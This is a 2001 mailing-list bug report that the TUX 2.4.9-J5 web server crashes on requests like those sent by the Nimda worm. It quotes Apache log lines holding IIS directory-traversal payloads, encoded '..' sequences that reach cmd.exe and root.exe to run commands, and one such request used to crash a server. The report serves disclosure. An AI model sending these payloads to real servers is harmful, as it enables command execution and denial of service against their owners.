[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]

Serous TUX 2.4.9-J5 problem



I tried using 2.4.9-J5 on a Athlon and a Dual P3 box. I had the same problem with each
tux would crash with what looked like an opps(but wasn't) saying invalid operand 0000
After thinking it might be a choice of compilter problem(gcc 2.96 vs egcs) and
discovering that wasn't the case I had one of the light bulb moments. The idea was that
Nimda was the cause. I telneted to another Linux box I admin on the net and pulled out
a line out of the access_log from Apache. I restarted Tux fresh and telneted to port 80
and pasted the line in and sure enough it instantly crashed. I believe the line I used was:


GET /scripts /..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0

but suspect any of these:

207.43.150.134 - - [20/Sep/2001:11:07:16 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 279
207.43.150.134 - - [20/Sep/2001:11:07:16 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 277
207.43.150.134 - - [20/Sep/2001:11:07:16 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 287
207.43.150.134 - - [20/Sep/2001:11:07:16 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 287
207.43.150.134 - - [20/Sep/2001:11:07:16 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
207.43.150.134 - - [20/Sep/2001:11:07:16 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318
207.43.150.134 - - [20/Sep/2001:11:07:16 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318
207.43.150.134 - - [20/Sep/2001:11:07:16 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334
207.43.150.134 - - [20/Sep/2001:11:07:16 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
207.43.150.134 - - [20/Sep/2001:11:07:16 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
207.43.150.134 - - [20/Sep/2001:11:07:16 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
207.43.150.134 - - [20/Sep/2001:11:07:16 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
207.43.150.134 - - [20/Sep/2001:11:07:16 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 284
207.43.150.134 - - [20/Sep/2001:11:07:16 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 284
207.43.150.134 - - [20/Sep/2001:11:07:16 -0500] "GET /scripts/..%25%35%63../winn
t/system32/cmd.exe?/c+dir HTTP/1.0" 404 301


would also cause it.

I have e-mailed this to Indo so it already knows about the problem. I thought everyone would
like to know sense it is a fairly serious bug and suspect it would be a fairly common one.
Tux 2.0.26 that comes with Redhat 7.1 is unaffected.







[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index] []